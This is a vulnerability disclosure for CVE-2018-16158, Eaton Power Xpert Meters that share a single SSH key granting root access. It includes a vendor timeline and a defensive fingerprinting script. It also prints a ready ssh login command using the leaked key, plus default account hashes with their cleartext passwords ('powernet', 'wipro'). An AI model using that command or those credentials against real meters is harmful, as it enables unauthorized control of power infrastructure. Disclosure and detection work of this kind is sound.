# Exploit Title: Eaton Xpert Meter SSH Private Key Exposure
# Date: 07-16-2018
# Exploit Author: BrianWGray
# Contact: https://twitter.com/BrianWGray
# WebPage: https://CTRLu.net/
# Vendor Homepage: http://www.eaton.com/
# Vendor Advisory: http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf
# Software Link: http://www.eaton.com/Eaton/ProductsServices/Electrical/ProductsandServices/PowerQualityandMonitoring/PowerandEnergyMeters/PowerXpertMeter400060008000/index.htm#tabs-2
# Version: Firmware 12.x.x.x and below; 13.x up to and including 13.3.x.x
# Recommended to update to Version 13.4.0.10 or above
# Tested on: Firmware 12.1.9.1 and 13.3.2.10
# CVE : CVE-2018-16158
# EDB-ID: 45283

Eaton Xpert Meter SSH Private Key Exposure

1. Description

Eaton Power Xpert Meters are used across industries for energy management,
monitoring circuit loading, and identifying power quality problems.
Meters running firmware 12.x.x.x, or 13.3.x.x and below, ship with a single
public/private key pair on the Power Xpert Meter hardware that allows
passwordless SSH authentication to any other affected Power Xpert Meter.
The vendor recommends updating to Version 13.4.0.10 or above. As the same key
is present on every affected meter and is easily retrievable from a device, an
attacker can use it to gain unauthorized remote access as uid 0 (root).


2. Proof of Concept

https://github.com/BrianWGray/msf/blob/master/exploits/linux/ssh/eaton_known_privkey.rb
https://github.com/BrianWGray/msf/blob/master/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb

Nexpose scanner checks

https://github.com/BrianWGray/cmty-nexpose-checks/blob/master/cmty-ssh-eaton-privkey.xml
https://github.com/BrianWGray/cmty-nexpose-checks/blob/master/cmty-ssh-eaton-privkey.vck
https://github.com/BrianWGray/cmty-nexpose-checks/blob/master/cmty-ssh-eaton-privkey-workaround.sol


# pwd
/home/admin/.ssh
# ls -lah
drwxr-xr-x 2 root root 160 Dec 31 1969 .
drwxr-xr-x 3 root root 60 Jul 9 05:21 ..
-rw------- 1 root root 859 Dec 31 1969 authorized_keys
-rw------- 1 root root 668 Dec 31 1969 id_dsa
-rw-r--r-- 1 root root 623 Dec 31 1969 id_dsa.pub
-rw------- 1 root root 887 Dec 31 1969 id_rsa
-rw-r--r-- 1 root root 236 Dec 31 1969 id_rsa.pub
-rw-r--r-- 1 root root 0 Dec 31 1969 known_hosts

# cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAn8LoId2N5i28cNKuEWWea3yt0I/LdT/NROrF44WZewtxch+DIwteQhM1qL6EKUSqz3Q2geX1crpOsNnyh67xy5lNo086u/QewOCSRAUGrQCXqFQ4JU8ny/qugWALQHjbIaPHj/3zMK09r4cpTSeAU7CW5nQyTKGmh7v9CAfWfcs= adam@localhost.localdomain
ssh-dss AAAAB3NzaC1kc3MAAACBAN6PHKCtekFnZ9F2qROXjCPwYk7ubA87NLC8zHSQJKkLaPEjtMD+t63TLbezpX2yeyt2erFjrsMDr0xfeXoumOb/zzowJzMKkShDs1zZZqO0AOpW6IyLVf/g1mprpTTXAJUUSrMRffVYyvfnqK7mdHqqzMoGnNEBNsXbRSu5kbulAAAAFQCmLpGNlshC916TJpgXuag7vooB9wAAAIBa3VxVvd7gYoIzWrfQvV3m9NzjgVsi1oTJcetHwx2+195pY1HfbnpXdNuXG5pJJLbAkizun51cq4v5+RZCnJLkiqNk2wlmcHwt3V6n+hGzf1gBoO+u8rRZobsv/uwt0rIUBnMOD2nCderT0KYtcix35or+DPsZOJTL2TWKOyJCAQAAAIAZOpFizZezK0XFSC8loPPGSwSFZFs8bShtukXhkBzfCSSrtnfcHQ2fxCAHYY2LgtHrN+hG0Y7095ALo3RsU+seN2Xci7xcTRpY8eV9J2MCPjEwrmNsTSbPCRVlV+G2bvGz8OTzE4OnRd+Whs5UG/2yM/i509LvtxYfuwABOqM7pg== adam@pxmeterbuild.nasa.ad.etn.com

# cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAn8LoId2N5i28cNKuEWWea3yt0I/LdT/NROrF44WZewtxch+DIwteQhM1qL6EKUSqz3Q2geX1crpOsNnyh67xy5lNo086u/QewOCSRAUGrQCXqFQ4JU8ny/qugWALQHjbIaPHj/3zMK09r4cpTSeAU7CW5nQyTKGmh7v9CAfWfcs= adam@localhost.localdomain

The private key distributed with the meters was tested across multiple Power Xpert Meters and successfully authenticated as any user account created on the devices, because of how the user profiles are configured. The options on the ssh command below pin the legacy algorithms the meter's older SSH service offers (SHA-1 MAC, aes128-cbc, diffie-hellman-group1-sha1 key exchange, ssh-rsa host key); current OpenSSH clients disable several of these by default, so the connection fails without them.

ssh -m hmac-sha1 -c aes128-cbc -o KexAlgorithms=diffie-hellman-group1-sha1 -o HostKeyAlgorithms=ssh-rsa -i ./id_rsa admin@hostname
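Because the public half of the leaked key pair is printed above, a defender does not need the private key to find the problem: the fingerprint alone identifies the entry in any authorized_keys file. The script below is an added example (it is not part of the original advisory, nor of the author's Metasploit or Nexpose checks) that parses OpenSSH public-key lines, computes the same SHA256/MD5 fingerprints `ssh-keygen -l` prints, and flags or strips entries matching the meter key copied from the dump above. The sample authorized_keys content and the second, harmless 2048-bit entry are constructed for the demonstration; the page does not say whether editing the root-owned authorized_keys on a meter persists across a reboot, so treat `strip_known_keys` as a way to produce a cleaned file, not as a verified device workaround.

```python
"""Fingerprint OpenSSH public keys and flag the leaked Eaton PXM key in authorized_keys files."""
import base64
import binascii
import hashlib
import struct

# Public half of the key pair found in /home/admin/.ssh on the meters (copied from the dump above).
EATON_PXM_PUBKEY = (
    "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAn8LoId2N5i28cNKuEWWea3yt0I/LdT/NROrF44WZewtxch+DIwte"
    "QhM1qL6EKUSqz3Q2geX1crpOsNnyh67xy5lNo086u/QewOCSRAUGrQCXqFQ4JU8ny/qugWALQHjbIaPH"
    "j/3zMK09r4cpTSeAU7CW5nQyTKGmh7v9CAfWfcs= adam@localhost.localdomain"
)


def _read_string(blob, off):
    """Read one SSH wire-format string (uint32 length + bytes) starting at offset off."""
    (n,) = struct.unpack(">I", blob[off:off + 4])
    off += 4
    if off + n > len(blob):
        raise ValueError("truncated key blob")
    return blob[off:off + n], off + n


def parse_pubkey(line):
    """Parse an authorized_keys / .pub line; return type, size, exponent, comment and fingerprints."""
    fields = line.split()
    # authorized_keys entries may start with options (from=, command=, no-pty ...): skip to the key type.
    idx = next((i for i, f in enumerate(fields) if f.startswith(("ssh-", "ecdsa-", "sk-"))), None)
    if idx is None or idx + 1 >= len(fields):
        raise ValueError("no key type / key data field")
    ktype, comment = fields[idx], " ".join(fields[idx + 2:])
    blob = base64.b64decode(fields[idx + 1], validate=True)
    wire_type, off = _read_string(blob, 0)
    if wire_type != ktype.encode():
        raise ValueError("key type on the line does not match the blob")
    mpints = []  # every remaining wire string, read as a big-endian integer
    while off < len(blob):
        raw, off = _read_string(blob, off)
        mpints.append(int.from_bytes(raw, "big"))
    if ktype == "ssh-rsa":          # blob = type, e, n
        bits, exponent = mpints[1].bit_length(), mpints[0]
    elif ktype == "ssh-dss":        # blob = type, p, q, g, y
        bits, exponent = mpints[0].bit_length(), None
    else:                           # ecdsa / ed25519: size is implied by the type
        bits, exponent = None, None
    sha256 = base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
    md5 = ":".join(f"{b:02x}" for b in hashlib.md5(blob).digest())
    return {"type": ktype, "bits": bits, "exponent": exponent, "comment": comment,
            "sha256": "SHA256:" + sha256, "md5": "MD5:" + md5}


# Fingerprints to hunt for; extend with any other key you have retired.
KNOWN_BAD = {parse_pubkey(EATON_PXM_PUBKEY)["sha256"]}


def _classify(text):
    """Yield (line_no, original_line, parsed_info_or_None) for each line of an authorized_keys text."""
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            yield no, line, None
            continue
        try:
            yield no, line, parse_pubkey(stripped)
        except (ValueError, binascii.Error, struct.error):
            yield no, line, None  # unparseable entry: left alone, but it is not a match


def find_known_keys(text, known=KNOWN_BAD):
    """Return (line_no, fingerprint, comment) for each entry matching a known-compromised key."""
    return [(no, info["sha256"], info["comment"])
            for no, _, info in _classify(text) if info and info["sha256"] in known]


def strip_known_keys(text, known=KNOWN_BAD):
    """Return the file content with known-compromised entries removed and everything else untouched."""
    return "\n".join(line for _, line, info in _classify(text)
                     if not (info and info["sha256"] in known)) + "\n"


def _rsa_pubkey_line(e, n, comment):
    """Build a syntactically valid ssh-rsa line from arbitrary integers (constructed test data, not a real key)."""
    def mpint(x):
        raw = x.to_bytes((x.bit_length() + 8) // 8, "big")  # adds a 0x00 byte when the top bit is set
        return struct.pack(">I", len(raw)) + raw
    blob = struct.pack(">I", 7) + b"ssh-rsa" + mpint(e) + mpint(n)
    return f"ssh-rsa {base64.b64encode(blob).decode()} {comment}"


# Constructed authorized_keys content: one harmless 2048-bit entry plus the leaked meter key.
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed sample, not a file taken from a meter",
    _rsa_pubkey_line(65537, (1 << 2047) | 0x10001, "ops@example.internal"),
    EATON_PXM_PUBKEY,
])

if __name__ == "__main__":
    for no, fp, comment in find_known_keys(SAMPLE_AUTHORIZED_KEYS):
        print(f"line {no}: known compromised key {fp} ({comment})")
```

Parsing the blob rather than comparing the base64 text means the check still fires when the entry carries options (`no-pty,command=...`) or a different comment, and the parsed fields show what the meters actually shipped: a 1024-bit RSA key with public exponent 35, the exponent older OpenSSH releases generated by default. Feeding the same fingerprint into an SSH-audit or configuration-management check is a vendor-independent way to confirm the key is gone after the firmware upgrade.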

Once logged into the device, there are a myriad of further issues: password hashes stored in /etc/passwd, weak file permissions, exploitable services, weak crypto algorithms, etc.

Observed local credentials (for the hashed entries, the value after the dash is the corresponding cleartext password):
ADMIN:ADMIN
admin:0wyDB0cXWCYDg:17619:0:99999:7::: - powernet
root:$1$OXHFmWqL$6cdSUjFXqvS1PHFyqxtZQ0:0:0:root:/root:/bin/sh - wipro

3. Solution:

A new version of this firmware already exists for meters with firmware versions 13.x and above. Eaton recommends all customers using the products above to install the newest firmware. Please download the latest firmware (Version 13.4.0.10) from the product portal.
In the future, as new firmware is made available for the Power Xpert Meter 4000/6000/8000, Eaton recommends that customers upgrade to the latest available release of firmware.
Power Xpert Meters 4000/6000/8000 with firmware version 12 and below were manufactured before September 2010 and are considered an end-of-life hardware platform. These older meters should be replaced with new Power Xpert Meters 4000/6000/8000.

4. Timeline:

* 07-16-2018: Discovered and validated
* 07-17-2018: Metasploit module generated for simple scanning and testing
* 07-18-2018: Vendor Notified via CybersecurityCoE@eaton.com at 1:06PM Eastern time
* 07-19-2018: Vendor initial response recognizing the submission 8:08AM Eastern time
* 07-20-2018: Submitted information to Cert.org
* 07-20-2018: Cert/CC declined involvement as long as Eaton was responding.
* 07-25-2018: Vendor responds with "If you upgrade to the latest version, you should not see them anymore."
* 07-25-2018: Question sent to Vendor - "As the issue has already been resolved is there any request for a wait period prior to publishing public vulnerability checks to allow other organizations to scan for this issue?"
* 07-25-2018: Vendor response - "Give us a few days. We are, in parallel, working on a communication for our customers too. As soon as we publish it, you could go ahead and release the information also. I will come back to you very soon."
* 08-08-2018: Update request sent to vendor - "Has an acceptable release date been set? Is it known which products and firmware versions are impacted to allow for accurate remediation information to be provided?"
* 08-13-2018: Vendor response - "We are preparing an advisory. This is very old firmware (2010) and hence the delay. I should be able to come back to you in 10 days once the advisory is formalized. You should then be able to release the information. I hope this is OK."
* 08-13-2018: Confirmation sent to vendor that the wait time has been accepted.
* 08-28-2018: Vendor response - "We have now put up an advisory from our end: http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf . You can go ahead and publish the vulnerabilities. Firmware version 13.x and above are upgradable. Unfortunately, version 12.x and below are end-of-life and can not be upgraded."
* 08-29-2018: Submitted to MITRE for a CVE 9:23pm, CVE-2018-16158 assigned within 3 hours.